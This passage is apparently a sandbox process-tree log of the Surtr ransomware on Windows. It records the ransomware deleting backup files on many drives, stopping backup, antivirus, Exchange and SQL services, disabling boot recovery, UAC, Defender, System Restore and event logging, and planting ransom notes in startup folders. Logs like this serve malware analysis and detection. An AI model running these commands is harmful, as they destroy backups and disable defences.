C:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*
3⤵
PID:3380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*
3⤵
PID:3400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*
3⤵
PID:3468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*
3⤵
PID:3476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*
3⤵
PID:3460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*
3⤵
PID:3452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*
3⤵
PID:3444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*
3⤵
PID:3436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*
3⤵
PID:3424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*
3⤵
PID:3408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
3⤵
PID:3484

C:\Windows\system32\net.exe
net stop "BackupExecRPCService"
4⤵
PID:3500

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecRPCService"
5⤵
PID:3508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*
3⤵
PID:3492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
3⤵
PID:3516

C:\Windows\system32\net.exe
net stop "BackupExecVSSProvider"
4⤵
PID:3524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecVSSProvider"
5⤵
PID:3532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
3⤵
PID:3540

C:\Windows\system32\net.exe
net stop "EPSecurityService"
4⤵
PID:3548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "EPSecurityService"
5⤵
PID:3556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
3⤵
PID:3564

C:\Windows\system32\net.exe
net stop "IISAdmin"
4⤵
PID:3572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "IISAdmin"
5⤵
PID:3580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
3⤵
PID:3600

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
4⤵
PID:3624

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
5⤵
- Modifies boot configuration data using bcdedit
PID:3680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
3⤵
PID:3592

C:\Windows\system32\net.exe
net stop "IMAP4Svc"
4⤵
PID:3608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "IMAP4Svc"
5⤵
PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
3⤵
PID:3632

C:\Windows\system32\net.exe
net stop "macmnsvc"
4⤵
PID:3640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "macmnsvc"
5⤵
PID:3648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "masvc"
3⤵
PID:3656

C:\Windows\system32\net.exe
net stop "masvc"
4⤵
PID:3664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "masvc"
5⤵
PID:3672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MBAMService"
3⤵
PID:3688

C:\Windows\system32\net.exe
net stop "MBAMService"
4⤵
PID:3696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MBAMService"
5⤵
PID:3704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
3⤵
PID:3712

C:\Windows\system32\net.exe
net stop "MBEndpointAgent"
4⤵
PID:3720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MBEndpointAgent"
5⤵
PID:3736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
3⤵
PID:3728

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
4⤵
PID:3744

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
5⤵
- Modifies boot configuration data using bcdedit
PID:3760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
3⤵
PID:3752

C:\Windows\system32\net.exe
net stop "McAfeeEngineService"
4⤵
PID:3768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeEngineService"
5⤵
PID:3776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
PID:3788

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
4⤵
- UAC bypass
PID:3804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
3⤵
PID:3796

C:\Windows\system32\net.exe
net stop "McAfeeFramework"
4⤵
PID:3812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeFramework"
5⤵
PID:3820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
3⤵
PID:3828

C:\Windows\system32\net.exe
net stop "McAfeeFrameworkMcAfeeFramework"
4⤵
PID:3836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
5⤵
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:3852

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
4⤵
PID:3868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "McShield"
3⤵
PID:3860

C:\Windows\system32\net.exe
net stop "McShield"
4⤵
PID:3876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McShield"
5⤵
PID:3896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:3888

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
4⤵
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:3912

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
4⤵
PID:3936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "mfemms"
3⤵
PID:3920

C:\Windows\system32\net.exe
net stop "mfemms"
4⤵
PID:3928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "mfemms"
5⤵
PID:3944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
3⤵
PID:3952

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
4⤵
PID:3968

C:\Windows\system32\net.exe
net stop "SQLAgent$PRACTTICEMGT"
4⤵
PID:4000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
5⤵
PID:3996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "mfevtp"
3⤵
PID:3960

C:\Windows\system32\net.exe
net stop "mfevtp"
4⤵
PID:3976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "mfevtp"
5⤵
PID:3992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
3⤵
PID:3984

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
4⤵
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:4008

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
4⤵
PID:4032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MMS"
3⤵
PID:4016

C:\Windows\system32\net.exe
net stop "MMS"
4⤵
PID:4024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MMS"
5⤵
PID:4040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:4048

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
4⤵
PID:4064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
3⤵
PID:4056

C:\Windows\system32\net.exe
net stop "mozyprobackup"
4⤵
PID:4080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "mozyprobackup"
5⤵
PID:4088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:4072

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
4⤵
PID:3084

C:\Windows\system32\net.exe
net stop "VMware NAT Service"
5⤵
PID:2604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMware NAT Service"
6⤵
PID:2864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:2768

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
4⤵
PID:2852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
3⤵
PID:3096

C:\Windows\system32\net.exe
net stop "MsDtsServer"
4⤵
PID:2856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MsDtsServer"
5⤵
PID:3104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:2900

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
4⤵
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
3⤵
PID:3112

C:\Windows\system32\net.exe
net stop "MsDtsServer100"
4⤵
PID:2904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MsDtsServer100"
5⤵
PID:3120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:3116

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
4⤵
PID:2600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
3⤵
PID:2880

C:\Windows\system32\net.exe
net stop "MsDtsServer110"
4⤵
PID:2940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MsDtsServer110"
5⤵
PID:2124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:3128

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
4⤵
PID:2964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:2632

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
4⤵
PID:2120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
3⤵
PID:2732

C:\Windows\system32\net.exe
net stop "MSExchangeES"
4⤵
PID:2648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeES"
5⤵
PID:2192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:2820

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
4⤵
PID:2808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:2696

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
4⤵
PID:3080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
3⤵
PID:2644

C:\Windows\system32\net.exe
net stop "MSExchangeIS"
4⤵
PID:2792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeIS"
5⤵
PID:2172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:2356

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
4⤵
PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:2168

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
4⤵
PID:2064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
3⤵
PID:1588

C:\Windows\system32\net.exe
net stop "MSExchangeMGMT"
4⤵
PID:2692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeMGMT"
5⤵
PID:2884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:1936

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
4⤵
PID:2096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
3⤵
PID:2832

C:\Windows\system32\net.exe
net stop "MSExchangeMTA"
4⤵
PID:888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeMTA"
5⤵
PID:1460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:2184

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
4⤵
PID:2128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:652

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
4⤵
PID:328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
3⤵
PID:1356

C:\Windows\system32\net.exe
net stop "MSExchangeSA"
4⤵
PID:2720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeSA"
5⤵
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:1552

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
4⤵
PID:816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
3⤵
PID:1436

C:\Windows\system32\net.exe
net stop "MSExchangeSRS"
4⤵
PID:1752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeSRS"
5⤵
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:1060

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
4⤵
PID:1152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:1900

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
4⤵
PID:2740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
3⤵
PID:1812

C:\Windows\system32\net.exe
net stop "MSOLAP$SQL_2008"
4⤵
PID:736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
5⤵
PID:1708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:1712

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
4⤵
PID:1664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
3⤵
PID:3184

C:\Windows\system32\net.exe
net stop "MSOLAP$SYSTEM_BGC"
4⤵
PID:3172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
5⤵
PID:2032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:640

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
4⤵
PID:3192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:3208

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
4⤵
PID:1988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
3⤵
PID:1904

C:\Windows\system32\net.exe
net stop "MSOLAP$TPS"
4⤵
PID:988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSOLAP$TPS"
5⤵
PID:896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
3⤵
PID:3240

C:\Windows\system32\net.exe
net stop "MSOLAP$TPSAMA"
4⤵
PID:3256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
5⤵
PID:3200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
3⤵
PID:1792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
3⤵
PID:1116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
3⤵
PID:3216

C:\Windows\system32\net.exe
net stop "MSSQL$BKUPEXEC"
4⤵
PID:1012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
5⤵
PID:1632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
3⤵
- Drops startup file
PID:852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
3⤵
- Drops startup file
PID:3252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
3⤵
PID:3288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
3⤵
PID:2948

C:\Windows\system32\net.exe
net stop "MSSQL$ECWDB2"
4⤵
PID:2828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
5⤵
PID:1076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
3⤵
PID:1744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
3⤵
PID:3236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
3⤵
PID:3296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
3⤵
PID:1252

C:\Windows\system32\net.exe
net stop "MSSQL$PRACTICEMGT"
4⤵
PID:3304

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
5⤵
PID:3224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
3⤵
PID:3268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
3⤵
PID:2592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
3⤵
PID:2352

C:\Windows\system32\net.exe
net stop "MSSQL$PRACTTICEBGC"
4⤵
PID:3036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
5⤵
PID:3032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
3⤵
PID:2052

C:\Windows\system32\attrib.exe
attrib +R /S "C:\ProgramData\Service"
4⤵
- Views/modifies file attributes
PID:2504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
3⤵
PID:2072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
3⤵
PID:3016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
3⤵
PID:2232

C:\Windows\system32\net.exe
net stop "MSSQL$SHAREPOINT"
4⤵
PID:2544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
3⤵
PID:2344

C:\Windows\system32\net.exe
net stop "MSSQL$SYSTEM_BGC"
4⤵
PID:2368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
5⤵
PID:2320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
3⤵
PID:2200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
3⤵
PID:2492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
3⤵
PID:1228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
3⤵
PID:1500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
3⤵
PID:2968

C:\Windows\system32\net.exe
net stop "MSSQL$VEEAMSQL2012"
4⤵
PID:3388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
5⤵
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
3⤵
PID:2528

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
4⤵
PID:2728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
